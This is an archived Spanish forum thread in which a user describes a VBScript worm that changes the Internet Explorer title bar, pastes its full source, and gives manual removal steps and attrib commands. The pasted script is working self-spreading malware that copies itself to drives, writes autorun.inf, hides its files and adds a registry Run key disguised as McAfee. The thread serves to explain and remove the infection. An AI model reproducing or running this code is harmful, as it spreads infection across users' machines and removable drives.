PDA

Ver la versión completa : Bantai usa e izrael al mukhid studio



ethersal
04-10-2008, 21:10
A cuantos os ha salido eso... "BANTAI USA E IZRAEL AL MUKHID STUDIO"... en vuestra barra de título de internet explorer?

Yo estaba infectado, el comportamiento de mi sistema era normal aunque con algunas diferencias, y un día me rallé y me puse a buscar en la web y en mi sistema de qué se trataba.

Si buscais en google, hay algunas webs que hablan de esto, pero como lo he eliminado voy a hacer un pequeño resumen de qué es.

Los síntomas de estar infectado, además de que te aparece ese título en el internet explorer, es que cuando haces doble click en muchos accesos que utilizan VBS del sistema para ejecutarse (ejemplo, Mi PC y los accesos a los discos duros), no hace nada. Es decir, que vas a explorar tu disco duro y no te responde al doble click, sino que has de darle con el boton derecho y hacer click en "Abrir" o "Explorar". Además de eso, internet explorer va lento de forma general, incluso explorar tu disco duro se hace pesado.

El virus en realidad no es un virus. Se trata de un script que se cuela como un virus a través de ejecución de vbs que el sistema utiliza cuando haces descargas directas o, sobre todo, utilizas discos duros usb y los exploras a través del menú emergente que te sale cuando lo detecta.

He aquí su código, para los más expertos de VBS y puedan explicar con exactitud lo que hace, pues yo entiendo por encima el funcionamiento.


on error resume next
Rem 121206, do u still remember dis day us_3?
Dim src, winpath, flashdrive, fs, mf, atr, tf, rg, nt, check, sd:atr = "[autorun]"&vbcrlf&"shellexecute=wscript.exe WIN31.dll.vbs":Set fs = CreateObject("Scripting.FileSystemObject"): Set mf = fs.getfile(Wscript.ScriptFullname): Dim text, size: size = mf.size: check = mf.drive.drivetype: Set text = mf.openastextstream(1, -2)
Do While Not text.atendofstream: src=src&text.readline: src = src & vbCrLf: Loop
Do: Set winpath = fs.getspecialfolder(0): Set tf = fs.getfile(winpath & "\WIN31.dll.vbs"): tf.Attributes = 32: Set tf = fs.createtextfile(winpath & "\WIN31.dll.vbs", 2, True): tf.write src: tf.Close: Set tf = fs.getfile(winpath & "\WIN31.dll.vbs"): tf.Attributes = 39
For Each flashdrive In fs.drives
If (flashdrive.drivetype = 1 Or flashdrive.drivetype = 2) And flashdrive.Path <> "A:" Then: Set tf = fs.getfile(flashdrive.Path & "\WIN31.dll.vbs"): tf.Attributes = 32: Set tf = fs.createtextfile(flashdrive.Path & "\WIN31.dll.vbs", 2, True): tf.write src: tf.Close: Set tf = fs.getfile(flashdrive.Path & "\WIN31.dll.vbs"): tf.Attributes = 39: Set tf = fs.getfile(flashdrive.Path & "\autorun.inf"): tf.Attributes = 32: Set tf = fs.createtextfile(flashdrive.Path & "\autorun.inf", 2, True): tf.write atr: tf.Close: Set tf = fs.getfile(flashdrive.Path & "\autorun.inf"): tf.Attributes = 39: End If
Next
Set rg = CreateObject("WScript.Shell"): rg.regwrite "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\Curr entVersion\Run\mcafee",winpath & "\WIN31.dll.vbs": rg.regwrite "HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\Window Title", "BANTAI USA & EZRAEL [AL - MUKHLIS STUDIO]": rg.regwrite "HKCR\vbsfile\DefaultIcon", "shell32.dll,2"
If check <> 1 Then Wscript.sleep 200000
Loop While check <> 1: Set sd = CreateObject("Wscript.shell"): sd.run winpath & "\explorer.exe /e,/select, " & Wscript.ScriptFullname


La forma de quitarlo, es aplicar el mostrar los archivos ocultos y sus extensiones mediante el menú de herramientas, y elimitar el archivo:

C:\autorun.inf
c:\win31.dll.vbs
C:\windows\win31.dll.vbs

y si se da el caso de que exista también, por lo que he visto en la web por otras versiones del script:

c:\key.exe
c:\windows\key.exe

Esto hay que hacerlo en TODOS los discos duros, y si no sabes si está infectado uno de los externos no explorar nunca con doble click, sino con el menú emergente y "Abrir" o "Explorar" y repetir este proceso.

Además de eso, para los discos locales internos, hay que quitar los registros de windows que corresponden al script y al titulito, para que comprobemos que todo funciona ok.

HKLM\Software\Microsoft\Internet Explorer\ -> una del titulo que nos interesa, BANTAI USA E IZRAEL AL MUKHID STUDIO
HKLM\Sofware\Microsoft\Windows\Current Version\Run\ Mcafee - Win31.dll.vbs

Si está el de Key.exe, tambien.

Después, reiniciar, y viola.

Os recomiendo que os deshabiliteis la funcion de ejecución de scripts automática, que windows tiene y utiliza sin permiso. En ocasiones facilita la vida para que hagamos doble click, y por otro lado genera vulnerabilidades como esta. Menos mal que el codigo no es tan malicioso como podria serlo.

Un saludo.

clarinetista
04-10-2008, 22:42
Gracias por el aporte , ethersal :)

ethersal
05-10-2008, 00:54
Y en mi curro están todos así. Lo que digo, un dia me rayé y me puse a investigar xD

De nada clarinetista

ethersal
05-10-2008, 11:17
Tengo que hacer un apunte.

Para encontrar los archivos no siempre bastará con permitir ver los archivos ocultos.

Es recomendable pues, ir a una ventana del cmd y escribir en la unidad donde vayas a desinfectar:

C:\>attrib -s -h win31.dll.vbs
C:\>attrib -s -h autorun.inf

AUnque como el script tiene distintas versiones, sería recomendable poner

C:\>attrib -s -h *.*

Y eliminar aquellos archivos que molesten. Además de eso, habeis de ser rápidos pues ambos archivos vuelven a coger su modo hide en cuestión de segundos.